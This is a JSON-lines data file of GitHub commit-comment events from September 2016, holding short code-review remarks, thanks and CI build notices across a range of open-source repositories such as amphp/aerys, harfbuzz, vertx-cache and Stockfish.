{"id":"4533956343","type":"CommitCommentEvent","actor":{"login":"bwoebi"},"repo":{"name":"amphp/aerys"},"payload":{"comment":{"id":18944755,"position":12,"line":280,"path":"lib/Websocket/Rfc6455Endpoint.php","commit_id":"0cd26e59b4bcc691acac5fc91faf4e65e6ed8db5","created_at":"2016-09-08T13:22:17Z","updated_at":"2016-09-08T13:22:17Z","body":"Then you can remove the _return_ too, if you yield the awaitable. The return value would be null in every case then."}},"created_at":"2016-09-08T13:22:17Z"}
{"id":"4533961252","type":"CommitCommentEvent","actor":{"login":"drott"},"repo":{"name":"behdad/harfbuzz"},"payload":{"comment":{"id":18944767,"position":null,"line":null,"path":null,"commit_id":"48677345281a93d8829dd37d0480a6062945416a","created_at":"2016-09-08T13:23:10Z","updated_at":"2016-09-08T13:23:10Z","body":"Unfortunately, this is semantically not identical. We found out that there are versions of 10.9.5 which actually report a CoreText version number higher than kCTVersionNumber10_9 but lower than kCTVersionNumber10_10. I'd suggest to find an alternative way of addressing your issue. Do you have any reference to the build failure?"}},"created_at":"2016-09-08T13:23:10Z"}
{"id":"4533968964","type":"CommitCommentEvent","actor":{"login":"bwoebi"},"repo":{"name":"amphp/aerys"},"payload":{"comment":{"id":18944781,"position":12,"line":280,"path":"lib/Websocket/Rfc6455Endpoint.php","commit_id":"0cd26e59b4bcc691acac5fc91faf4e65e6ed8db5","created_at":"2016-09-08T13:24:27Z","updated_at":"2016-09-08T13:24:27Z","body":"the try/catch probably should be only around the final `yield`; `$this->tryAppOnClose()` oughtn't throwing."}},"created_at":"2016-09-08T13:24:27Z"}
{"id":"4533971722","type":"CommitCommentEvent","actor":{"login":"droserasprout"},"repo":{"name":"Mi5Devs/android_device_xiaomi_gemini"},"payload":{"comment":{"id":18944784,"position":null,"line":null,"path":null,"commit_id":"fc689d4601ce4bcc96e25545dac65b59bea8c761","created_at":"2016-09-08T13:24:53Z","updated_at":"2016-09-08T13:24:53Z","body":"Dude, are you sure about this? I'm not happen to be expert on this subject but at least ro.product.model removing seems weird, now phone recognized as just Android instead of MI5. This shit ain't that useless."}},"created_at":"2016-09-08T13:24:53Z"}
{"id":"4533972772","type":"CommitCommentEvent","actor":{"login":"Girish1K"},"repo":{"name":"Girish1K/Liferay_AutoNarrative-Portlet"},"payload":{"comment":{"id":18944785,"position":null,"line":null,"path":null,"commit_id":"3276eb43303bd27231318f37f824191e1f094de0","created_at":"2016-09-08T13:25:03Z","updated_at":"2016-09-08T13:25:03Z","body":"initial commit"}},"created_at":"2016-09-08T13:25:03Z"}
{"id":"4533973388","type":"CommitCommentEvent","actor":{"login":"pdcp1"},"repo":{"name":"weglow/weglow.github.io"},"payload":{"comment":{"id":18944786,"position":null,"line":null,"path":null,"commit_id":"54790b92a5f4b5bc84d3eb75e26e3053a9946c20","created_at":"2016-09-08T13:25:11Z","updated_at":"2016-09-08T13:25:11Z","body":"que lindos que somos :heart_eyes: "}},"created_at":"2016-09-08T13:25:11Z"}
{"id":"4533974933","type":"CommitCommentEvent","actor":{"login":"CharliePoole"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":18944791,"position":null,"line":null,"path":null,"commit_id":"65f0b974cb65a6588a54de96f0ce929f57e39f59","created_at":"2016-09-08T13:25:25Z","updated_at":"2016-09-08T13:25:25Z","body":"We added it so we could use it in our tests. I briefly considered documenting it for users but thought better of it. None of our ALIs use Linq either."}},"created_at":"2016-09-08T13:25:25Z"}
{"id":"4533979397","type":"CommitCommentEvent","actor":{"login":"justinhomes"},"repo":{"name":"ziyasal/RepositoryT.EntityFramework"},"payload":{"comment":{"id":18944801,"position":null,"line":null,"path":null,"commit_id":"f80546d98f4c4ef35fe915c6c55b96b976698622","created_at":"2016-09-08T13:26:05Z","updated_at":"2016-09-08T13:26:05Z","body":"Thanks that worked"}},"created_at":"2016-09-08T13:26:05Z"}
{"id":"4533979628","type":"CommitCommentEvent","actor":{"login":"sascanagl"},"repo":{"name":"SAFSDEV/build"},"payload":{"comment":{"id":18944802,"position":null,"line":null,"path":null,"commit_id":"425f29ff5599d6c1633baf0844e474c2d4891473","created_at":"2016-09-08T13:26:09Z","updated_at":"2016-09-08T13:26:09Z","body":"Interesting...my first thought is that this seems to place a new requirement for GIT_HOME being set that might not have existed before?  On both of my machines on which I have done ant builds using GIT this environment variable is NOT set.  Not that it matters, but I was going to give this a try and saw this \"required\" setting that my machines do not have."}},"created_at":"2016-09-08T13:26:09Z"}
{"id":"4533980130","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":18944803,"position":32,"line":0,"path":"HelloWorld/Program.cs","commit_id":"24986ebf284e88147a01a5ce6ca449f9460c5b0c","created_at":"2016-09-08T13:26:14Z","updated_at":"2016-09-08T13:26:14Z","body":"По сути, ответом будет последняя рассчитанная величина. Но если нас интересуют несколько величин, то уже все не так просто. Кроме того, в секции \"найти\" мы уже определили те переменные, которые нам нужно найти. Можно считать, что ответ - это та часть решения, в которой мы непосредственно присваиваем им значения. Но это тоже довольно спутано будет. Давай договоримся, что мы в конце программы будет объявлять и присваивать значения специальным переменным, называемыми result. Так будет яснее на первых порах. "}},"created_at":"2016-09-08T13:26:14Z"}
{"id":"4533984903","type":"CommitCommentEvent","actor":{"login":"sraaphorst"},"repo":{"name":"spakzad/ocs"},"payload":{"comment":{"id":18944813,"position":null,"line":null,"path":null,"commit_id":"f4add0b17482dabb9e32e93201b5bc616f691674","created_at":"2016-09-08T13:27:05Z","updated_at":"2016-09-08T13:27:05Z","body":"Hi Sabrina,\r\n\r\nCarlos told me that you were having issues with the baseline testing.\r\n\r\nThe way that this works is that for a number of different combinations of input values, the expected output is hashed down to a small value, and this is stored in the baseline. The reason we hash the output is because it is not feasible to store an entire output file since they can be large and with many test cases, this turns out to be too big.\r\n\r\nSo when you run testing, what happens is that the ITC is run for the various combinations of input values. The output is hashed, and the hash is compared to what the previous hash stored in the baseline file is.\r\n\r\nThus, if you make even a tiny change to the output, such as you did in `GmosPrinter.java` (e.g. by adding spaces before the word arcsec amongst other things), this changes the entire hash for the output dramatically, and the new output hash will no longer match the old calculated hash value.\r\n\r\nThe way to move forward here is to run the ITC with the input values and make sure that the output looks exactly like you expect it to look. Then, when you've confirmed that, we can rebuild the baseline, which will generate the new hashes for the output and make the test cases pass.\r\n\r\nDoes that make sense? I can clarify anything if it is not clear or you want / need more details."}},"created_at":"2016-09-08T13:27:05Z"}
{"id":"4533987295","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18944819,"position":null,"line":null,"path":null,"commit_id":"a8e45478df98e7b93531fd85cfad7c553d87aca9","created_at":"2016-09-08T13:27:29Z","updated_at":"2016-09-08T13:27:29Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 966](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12936&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-08T13:27:29Z"}
{"id":"4533988790","type":"CommitCommentEvent","actor":{"login":"melke"},"repo":{"name":"cescoffier/vertx-cache"},"payload":{"comment":{"id":18944821,"position":null,"line":null,"path":null,"commit_id":"7ac6c9cf6bae13fb62203dbf3ec52dd8af9d2401","created_at":"2016-09-08T13:27:44Z","updated_at":"2016-09-08T13:27:44Z","body":"Thank you so much @cescoffier Your clarifications are very useful!\r\n\r\nWhat if the Guava code itself spins off a separate thread that does cache eviction periodically. Would that be a problem, considering the Vert.x threading model? \r\n\r\nI have never quite understood what \"following the Vert.x threading model\" actually means. Does it simply mean \"never block the event loop thread\" or \"never share an object between Contexts or other threads, because it breaks the built-in thread-safety that comes with single-threaded architecture\"? If the latter is the case, why are people using Dependency Injection frameworks together with Vert.x? \r\nI'm sorry for all the questions, I hope you have patience with me :) "}},"created_at":"2016-09-08T13:27:44Z"}
{"id":"4533994808","type":"CommitCommentEvent","actor":{"login":"leonkirchlechner"},"repo":{"name":"getflourish/Select-Below"},"payload":{"comment":{"id":18944832,"position":null,"line":null,"path":null,"commit_id":"d342dcf295ab9bd1f4fffff579b2f33e6a1e8504","created_at":"2016-09-08T13:28:42Z","updated_at":"2016-09-08T13:28:42Z","body":"Very useful plugin! Do you plan to make an update for Sketch v.39.1 ? Would be great! :)"}},"created_at":"2016-09-08T13:28:42Z"}
{"id":"4533996888","type":"CommitCommentEvent","actor":{"login":"thc202"},"repo":{"name":"rscipien/zap-extensions"},"payload":{"comment":{"id":18944836,"position":62,"line":62,"path":"test/org/zaproxy/zap/extension/pscanrulesBeta/CharsetMismatchScannerUnitTest.java","commit_id":"648b2e687de16835f78b7462b76d68ebabd50335","created_at":"2016-09-08T13:29:02Z","updated_at":"2016-09-08T13:29:02Z","body":"The level should be changed only if the test requires it, which does not seem to be the case (same for other tests as well)."}},"created_at":"2016-09-08T13:29:02Z"}
{"id":"4534000335","type":"CommitCommentEvent","actor":{"login":"benkonrath"},"repo":{"name":"dustinfarris/ember-django-adapter"},"payload":{"comment":{"id":18944847,"position":null,"line":null,"path":null,"commit_id":"4c4489b9056896728dbb4bf0350169179c4b943b","created_at":"2016-09-08T13:29:38Z","updated_at":"2016-09-08T13:29:38Z","body":"Thanks Dustin!"}},"created_at":"2016-09-08T13:29:38Z"}
{"id":"4534002493","type":"CommitCommentEvent","actor":{"login":"kpodemski"},"repo":{"name":"PrestaShop/docs"},"payload":{"comment":{"id":18944852,"position":null,"line":null,"path":null,"commit_id":"9dcb030cac48965157a130ed9a11deb118ade12a","created_at":"2016-09-08T13:30:00Z","updated_at":"2016-09-08T13:30:00Z","body":":heart: "}},"created_at":"2016-09-08T13:30:00Z"}
{"id":"4534006752","type":"CommitCommentEvent","actor":{"login":"cescoffier"},"repo":{"name":"cescoffier/vertx-cache"},"payload":{"comment":{"id":18944861,"position":null,"line":null,"path":null,"commit_id":"7ac6c9cf6bae13fb62203dbf3ec52dd8af9d2401","created_at":"2016-09-08T13:30:45Z","updated_at":"2016-09-08T13:30:45Z","body":"ah ah, I forgot about the eviction strategy. So, yes the object is going to be access by a second thread that may block. I guess this can be ignored, as except if you hitting your object a lot it should not impact too much your performances. \r\n\r\nThe Vert.x thread model is intended to remove the use of synchronized blocks by making the code executed by a single thread. So, you can't have deadlock and you reduce the waiting time on monitor."}},"created_at":"2016-09-08T13:30:45Z"}
{"id":"4534009424","type":"CommitCommentEvent","actor":{"login":"mogoodrich"},"repo":{"name":"PIH/openmrs-module-pihcore"},"payload":{"comment":{"id":18944863,"position":5,"line":307,"path":"api/src/main/resources/messages.properties","commit_id":"17d6f416b4e64074f99bfc7bf5002421efec13e3","created_at":"2016-09-08T13:31:12Z","updated_at":"2016-09-08T13:31:12Z","body":"We will have to be aware of making this configurable when we roll out to Thomonde, I assume? @dmdesimone @cioan ?"}},"created_at":"2016-09-08T13:31:12Z"}
{"id":"4534009568","type":"CommitCommentEvent","actor":{"login":"andyasne"},"repo":{"name":"ndrmc/cats"},"payload":{"comment":{"id":18944864,"position":null,"line":null,"path":null,"commit_id":"50af2be6b17177c2b220199483438f21449b2c68","created_at":"2016-09-08T13:31:14Z","updated_at":"2016-09-08T13:31:14Z","body":"CATS-1364 "}},"created_at":"2016-09-08T13:31:14Z"}
{"id":"4534013630","type":"CommitCommentEvent","actor":{"login":"touv"},"repo":{"name":"castorjs/castor-core"},"payload":{"comment":{"id":18944872,"position":null,"line":null,"path":null,"commit_id":"02b57d0fbcc6d9fb0a649482d924fef501d60b53","created_at":"2016-09-08T13:31:55Z","updated_at":"2016-09-08T13:31:55Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;pZsP1MrA&#x2F;1-permettre-l-appel-a-l-api-avec-des-url-human-friendly\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Permettre l&#39;appel à l&#39;API avec des URL &quot;Human Friendly&quot;</a>"}},"created_at":"2016-09-08T13:31:55Z"}
{"id":"4534014408","type":"CommitCommentEvent","actor":{"login":"andyasne"},"repo":{"name":"ndrmc/cats"},"payload":{"comment":{"id":18944875,"position":null,"line":null,"path":null,"commit_id":"0a4a01e771e319cdd33a1343f73cf13eb3e425ba","created_at":"2016-09-08T13:32:02Z","updated_at":"2016-09-08T13:32:02Z","body":"CATS-1364"}},"created_at":"2016-09-08T13:32:02Z"}
{"id":"4534015050","type":"CommitCommentEvent","actor":{"login":"ransombriggs"},"repo":{"name":"heroku/heroku"},"payload":{"comment":{"id":18944876,"position":null,"line":null,"path":null,"commit_id":"9f5fb2260c16895e22c4687009548f3404b51200","created_at":"2016-09-08T13:32:10Z","updated_at":"2016-09-08T13:32:10Z","body":"@bluta I had to roll this back because this did not work on windows due to an `ffi` dependency.\r\n\r\n```\r\nfrom C:/Program Files (x86)/Heroku/ruby-2.1.7/lib/ruby/2.1.0/rubygems/core_ext/kernel_require.rb:55:in require': cannot load such file -- ffi (LoadError)\r\nfrom C:/Program Files (x86)/Heroku/ruby-2.1.7/lib/ruby/2.1.0/rubygems/core_ext/kernel_require.rb:55:inrequire'\r\nfrom C:/Program Files (x86)/Heroku/vendor/gems/rest-client-1.8.0/lib/restclient/windows/root_certs.rb:2:in <top (required)>'\r\nfrom C:/Program Files (x86)/Heroku/vendor/gems/rest-client-1.8.0/lib/restclient/windows.rb:7:inrequire_relative'\r\nfrom C:/Program Files (x86)/Heroku/vendor/gems/rest-client-1.8.0/lib/restclient/windows.rb:7\r\n```"}},"created_at":"2016-09-08T13:32:10Z"}
{"id":"4534016052","type":"CommitCommentEvent","actor":{"login":"sorbits"},"repo":{"name":"textmate/textmate"},"payload":{"comment":{"id":18944879,"position":207,"line":125,"path":"Frameworks/OakAppKit/src/OakPopOutAnimation.mm","commit_id":"dd3ebefe3f60b323af5a6b1e104c04b43da78eeb","created_at":"2016-09-08T13:32:19Z","updated_at":"2016-09-08T13:32:19Z","body":"@jtbandes The animation’s delegate is strong so this is causing a retain cycle.\r\n\r\nI tried setting `removedOnCompletion` to `YES` (to break the cycle) but now I sometimes see a quick flash after the animation is over, I assume this is why you disabled `removedOnCompletion`.\r\n\r\nAny input on this?"}},"created_at":"2016-09-08T13:32:19Z"}
{"id":"4534018661","type":"CommitCommentEvent","actor":{"login":"zzawadz"},"repo":{"name":"mi2-warsaw/FSelectorRcpp"},"payload":{"comment":{"id":18944885,"position":null,"line":null,"path":null,"commit_id":"12790e7c82289f743d20f7de78f1aa7a9fe09d71","created_at":"2016-09-08T13:32:46Z","updated_at":"2016-09-08T13:32:46Z","body":"Maybe it was in 1996?"}},"created_at":"2016-09-08T13:32:46Z"}
{"id":"4534029930","type":"CommitCommentEvent","actor":{"login":"fcboucher"},"repo":{"name":"fcboucher/BBMV"},"payload":{"comment":{"id":18944905,"position":null,"line":null,"path":null,"commit_id":"7de4045878b9c380e6f03048392ef5f2af3d1b30","created_at":"2016-09-08T13:34:44Z","updated_at":"2016-09-08T13:34:44Z","body":"Tested with problematic examples: works well."}},"created_at":"2016-09-08T13:34:44Z"}
{"id":"4534031878","type":"CommitCommentEvent","actor":{"login":"xuda27"},"repo":{"name":"xuda27/xuda27.github.io"},"payload":{"comment":{"id":18944912,"position":null,"line":null,"path":null,"commit_id":"51f1c3d41794a9cd7c5481eb8d333432fe2599f7","created_at":"2016-09-08T13:35:04Z","updated_at":"2016-09-08T13:35:04Z","body":"w(ﾟДﾟ)w修改了readme"}},"created_at":"2016-09-08T13:35:04Z"}
{"id":"4534033107","type":"CommitCommentEvent","actor":{"login":"borriglione"},"repo":{"name":"quadra-informatique/Atos-Magento"},"payload":{"comment":{"id":18944916,"position":21,"line":281,"path":"app/code/community/Quadra/Atos/Model/Ipn.php","commit_id":"4a08bce26f8ecd5e23b3da207b43853843fef923","created_at":"2016-09-08T13:35:17Z","updated_at":"2016-09-08T13:35:17Z","body":"Don't add html code in plain in source code. This cannot be changed by translation, only but controller rewrite. No '<br /><br />' necessary here at all"}},"created_at":"2016-09-08T13:35:17Z"}
{"id":"4534034272","type":"CommitCommentEvent","actor":{"login":"borriglione"},"repo":{"name":"quadra-informatique/Atos-Magento"},"payload":{"comment":{"id":18944919,"position":33,"line":293,"path":"app/code/community/Quadra/Atos/Model/Ipn.php","commit_id":"4a08bce26f8ecd5e23b3da207b43853843fef923","created_at":"2016-09-08T13:35:27Z","updated_at":"2016-09-08T13:35:27Z","body":"Remove '<br /><br />'"}},"created_at":"2016-09-08T13:35:27Z"}
{"id":"4534041282","type":"CommitCommentEvent","actor":{"login":"carlmjohnson"},"repo":{"name":"department-of-veterans-affairs/vets-api"},"payload":{"comment":{"id":18944937,"position":null,"line":null,"path":null,"commit_id":"ab7ed3a6cadd19e275aa30551e058993329813af","created_at":"2016-09-08T13:36:36Z","updated_at":"2016-09-08T13:36:36Z","body":"Nice."}},"created_at":"2016-09-08T13:36:36Z"}
{"id":"4534046095","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18944946,"position":null,"line":null,"path":null,"commit_id":"a8e45478df98e7b93531fd85cfad7c553d87aca9","created_at":"2016-09-08T13:37:25Z","updated_at":"2016-09-08T13:37:25Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 966](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12936&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:09:57"}},"created_at":"2016-09-08T13:37:25Z"}
{"id":"4534046118","type":"CommitCommentEvent","actor":{"login":"bjornfor"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18944947,"position":null,"line":null,"path":null,"commit_id":"7ffbe5174f0b349396571031a7a3d8ddfb08cd41","created_at":"2016-09-08T13:37:26Z","updated_at":"2016-09-08T13:37:26Z","body":"Forgot to say, I changed md5 -> sha256 while at it."}},"created_at":"2016-09-08T13:37:26Z"}
{"id":"4534048674","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18944952,"position":null,"line":null,"path":null,"commit_id":"fc7c2f40d279c6ac77f88e664479085850aa68b2","created_at":"2016-09-08T13:37:50Z","updated_at":"2016-09-08T13:37:50Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 967](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12941&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-08T13:37:50Z"}
{"id":"4534053384","type":"CommitCommentEvent","actor":{"login":"overlaser"},"repo":{"name":"overlaser/DayDayUp"},"payload":{"comment":{"id":18944963,"position":null,"line":null,"path":null,"commit_id":"a7e3ddd30f3265986051e1885372af7f2155fb49","created_at":"2016-09-08T13:38:37Z","updated_at":"2016-09-08T13:38:37Z","body":"怎么搞"}},"created_at":"2016-09-08T13:38:37Z"}
{"id":"4534054906","type":"CommitCommentEvent","actor":{"login":"yhsy"},"repo":{"name":"yhsy/yhsy.github.io"},"payload":{"comment":{"id":18944965,"position":2,"line":1,"path":"pc/index.html","commit_id":"517acd07ba703694b91709bd59356fe05fd31e1e","created_at":"2016-09-08T13:38:53Z","updated_at":"2016-09-08T13:38:53Z","body":"haha"}},"created_at":"2016-09-08T13:38:53Z"}
{"id":"4534056971","type":"CommitCommentEvent","actor":{"login":"xbhoneybee"},"repo":{"name":"xbhoneybee/ACM_ICPC"},"payload":{"comment":{"id":18944973,"position":null,"line":null,"path":null,"commit_id":"bd49f5b8bc5875fbf94d58391c0007d0f70f874e","created_at":"2016-09-08T13:39:14Z","updated_at":"2016-09-08T13:39:14Z","body":"已ac"}},"created_at":"2016-09-08T13:39:14Z"}
{"id":"4534072139","type":"CommitCommentEvent","actor":{"login":"kirjakov"},"repo":{"name":"kirjakov/laba0"},"payload":{"comment":{"id":18944997,"position":6,"line":6,"path":"laba","commit_id":"e8b0294db940106ab6aefd7cf46af043aa710d26","created_at":"2016-09-08T13:41:38Z","updated_at":"2016-09-08T13:41:38Z","body":"jkllk"}},"created_at":"2016-09-08T13:41:38Z"}
{"id":"4534072739","type":"CommitCommentEvent","actor":{"login":"fsateler"},"repo":{"name":"fsateler/mkosi"},"payload":{"comment":{"id":18944998,"position":6,"line":456,"path":"mkosi","commit_id":"3656ae181c052a5f0b22456d364ed9dc4c40854b","created_at":"2016-09-08T13:41:44Z","updated_at":"2016-09-08T13:41:44Z","body":"So, usrmerge lives in the universe repository (ie, stuff not maintained by canonical). That leaves us with 2 options: do not install usrmerge (and wait for debootstrap [to do the merge by itself](https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=810301)), or add the multiverse repository. @poettering ?"}},"created_at":"2016-09-08T13:41:44Z"}
{"id":"4534081241","type":"CommitCommentEvent","actor":{"login":"tscolari"},"repo":{"name":"cloudfoundry/grootfs"},"payload":{"comment":{"id":18945013,"position":5,"line":124,"path":"integration/groot/create_remote_test.go","commit_id":"5df1c0f9586010f698c59c0e6112333d0785baa7","created_at":"2016-09-08T13:43:11Z","updated_at":"2016-09-08T13:43:11Z","body":"We've added a chore for that in the icebox already, we're going to move it up in the backlog"}},"created_at":"2016-09-08T13:43:11Z"}
{"id":"4534084295","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"caskdata/hydrator-plugins"},"payload":{"comment":{"id":18945016,"position":null,"line":null,"path":null,"commit_id":"4bbcc1274d3800fb036aaea518b3df86a209867d","created_at":"2016-09-08T13:43:38Z","updated_at":"2016-09-08T13:43:38Z","body":"Updated code with review comments and design comments on https://wiki.cask.co/display/CE/Decision+Tree+Regression\r\nPlease review again. Thanks!"}},"created_at":"2016-09-08T13:43:38Z"}
{"id":"4534086625","type":"CommitCommentEvent","actor":{"login":"mogoodrich"},"repo":{"name":"PIH/openmrs-module-pihcore"},"payload":{"comment":{"id":18945023,"position":15,"line":233,"path":"omod/src/main/webapp/resources/scripts/visit/visit.js","commit_id":"22f8dc3fc22fa7507e2ab940a1eb34fb23471f20","created_at":"2016-09-08T13:44:01Z","updated_at":"2016-09-08T13:44:01Z","body":"I just looked at this quickly, but would it make sense to make this a generic loadSectionForPrint() method?  It could then delegate to loadSection() passing in the print template instead of the display template (or both loadSectionForPrint() and loadSection()) could delegate to a new private method that takes in a template and loads the  section.\r\n\r\nIf this makes some sense but we don't want to do it now, worth putting a comment in the code to remember to do it if we ever reach the point where we need to print multiple sections, to avoid a pattern of having many loadXSection() methods.\r\n\r\n"}},"created_at":"2016-09-08T13:44:01Z"}
{"id":"4534088380","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18945025,"position":null,"line":null,"path":null,"commit_id":"2636a7d8176ff0585de5e9db7df55b7fcd1fea5f","created_at":"2016-09-08T13:44:19Z","updated_at":"2016-09-08T13:44:19Z","body":"Why LTC?\r\nWhere is the STC?"}},"created_at":"2016-09-08T13:44:19Z"}
{"id":"4534090140","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18945028,"position":null,"line":null,"path":null,"commit_id":"c2d60cc91f28b9a9abfdbe35be0e5388de8a8cc9","created_at":"2016-09-08T13:44:35Z","updated_at":"2016-09-08T13:44:35Z","body":"Also see [Issue 259: Remove integer.cpp ARMEL workarounds](http://github.com/weidai11/cryptopp/issues/259)."}},"created_at":"2016-09-08T13:44:35Z"}
{"id":"4534093308","type":"CommitCommentEvent","actor":{"login":"mogoodrich"},"repo":{"name":"PIH/openmrs-module-pihcore"},"payload":{"comment":{"id":18945044,"position":61,"line":333,"path":"omod/src/main/webapp/resources/scripts/visit/visit.js","commit_id":"22f8dc3fc22fa7507e2ab940a1eb34fb23471f20","created_at":"2016-09-08T13:45:07Z","updated_at":"2016-09-08T13:45:07Z","body":"Following with the comment above, seems like we could generize this as a print section function if we need to."}},"created_at":"2016-09-08T13:45:07Z"}
{"id":"4534094030","type":"CommitCommentEvent","actor":{"login":"mgerhardy"},"repo":{"name":"google/flatbuffers"},"payload":{"comment":{"id":18945049,"position":1,"line":1,"path":"net/FlatBuffers/IFlatbufferObject .cs","commit_id":"8e3fa336eb894317cd828163d1677265da3a3483","created_at":"2016-09-08T13:45:15Z","updated_at":"2016-09-08T13:45:15Z","body":"Is the whitespace in the filename intended?"}},"created_at":"2016-09-08T13:45:15Z"}
{"id":"4534095819","type":"CommitCommentEvent","actor":{"login":"tcz001"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18945057,"position":null,"line":null,"path":null,"commit_id":"173be4886977f85bf749c6afade2e3a5a08c69d3","created_at":"2016-09-08T13:45:31Z","updated_at":"2016-09-08T13:45:31Z","body":"Yes, I think we can follow how OTR3-spec did."}},"created_at":"2016-09-08T13:45:31Z"}
{"id":"4534097878","type":"CommitCommentEvent","actor":{"login":"DannieFly"},"repo":{"name":"DannieFly/DannieFly.github.io"},"payload":{"comment":{"id":18945063,"position":1,"line":1,"path":"README.md","commit_id":"dfa035c66e0f8590becaf092fa5f65dcb9d72c19","created_at":"2016-09-08T13:45:48Z","updated_at":"2016-09-08T13:45:48Z","body":"https://danniefly.github.io/"}},"created_at":"2016-09-08T13:45:48Z"}
{"id":"4534100228","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18945068,"position":null,"line":null,"path":null,"commit_id":"2636a7d8176ff0585de5e9db7df55b7fcd1fea5f","created_at":"2016-09-08T13:46:11Z","updated_at":"2016-09-08T13:46:11Z","body":"@VoyagerOne I was wondering too, but then I detected Marcos according advice on pull #789 ;-)"}},"created_at":"2016-09-08T13:46:11Z"}
{"id":"4534101938","type":"CommitCommentEvent","actor":{"login":"zigbert"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18945072,"position":1,"line":1,"path":"woof-code/rootfs-packages/jwm_config/usr/local/jwm_config/menu_build_places_drives","commit_id":"c4b567db21c44f4d4c8c98607793ed5595cc70b4","created_at":"2016-09-08T13:46:27Z","updated_at":"2016-09-08T13:46:27Z","body":"Works great - Go man :)"}},"created_at":"2016-09-08T13:46:27Z"}
{"id":"4534102138","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"jfoug/Module-Build-Pluggable-XSUtil"},"payload":{"comment":{"id":18945076,"position":null,"line":null,"path":null,"commit_id":"a0e1cfa8f9cf98ccea23800ff130b49c08457be8","created_at":"2016-09-08T13:46:29Z","updated_at":"2016-09-08T13:46:29Z","body":"This is a SHOW STOPPER for anyone using Cygwin.  Is this going to be fixed merged into a v1.03 any time soon?\r\n\r\nThe only way to make this work in cygwin, is to do a force install, then hand edit the installed (but not working) XSUtil.pm file"}},"created_at":"2016-09-08T13:46:29Z"}
{"id":"4534102227","type":"CommitCommentEvent","actor":{"login":"mashedcode"},"repo":{"name":"google/closure-library"},"payload":{"comment":{"id":18945077,"position":null,"line":null,"path":null,"commit_id":"7a02682360d1f3f79c807d0e3088a985fef4235c","created_at":"2016-09-08T13:46:30Z","updated_at":"2016-09-08T13:46:30Z","body":"It seems like this comes from closure-compiler but how's the transpiler compiled/taken from exactly for the closure-library?"}},"created_at":"2016-09-08T13:46:30Z"}
{"id":"4534106216","type":"CommitCommentEvent","actor":{"login":"touv"},"repo":{"name":"castorjs/castor-core"},"payload":{"comment":{"id":18945084,"position":null,"line":null,"path":null,"commit_id":"f9695e768ca1f60631e7835cc70f89fa0cc399cd","created_at":"2016-09-08T13:47:10Z","updated_at":"2016-09-08T13:47:10Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;WVzCJXnu&#x2F;6-dans-la-configuration-des-collectionsfields-datasetfiels-mettre-le-code-jbj-dans-une-varaiable-nommee-stylesheet-et-pas-directem\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Dans la configuration des collectionsFields &#x2F; datasetFiels &#x2F; ... mettre le code JBJ dans une varaiable nommée stylesheet et pas directement dans content&lt;</a>"}},"created_at":"2016-09-08T13:47:10Z"}
{"id":"4534108624","type":"CommitCommentEvent","actor":{"login":"unity"},"repo":{"name":"hull-ships/hull-hubspot"},"payload":{"comment":{"id":18945090,"position":6,"line":27,"path":"package.json","commit_id":"3c3828b9f7d6c00168029717716feed1b62c0062","created_at":"2016-09-08T13:47:33Z","updated_at":"2016-09-08T13:47:33Z","body":"you should add nf to package.json dependencies"}},"created_at":"2016-09-08T13:47:33Z"}
{"id":"4534111582","type":"CommitCommentEvent","actor":{"login":"silvanagv"},"repo":{"name":"hoslersk/your-space-project"},"payload":{"comment":{"id":18945097,"position":5,"line":5,"path":"YourSpace/app/views/listings/show.html.erb","commit_id":"96c04d1e5b3a9c89e2f44ba122adbaa59e52a09a","created_at":"2016-09-08T13:48:02Z","updated_at":"2016-09-08T13:48:02Z","body":"Here is a test comment"}},"created_at":"2016-09-08T13:48:02Z"}
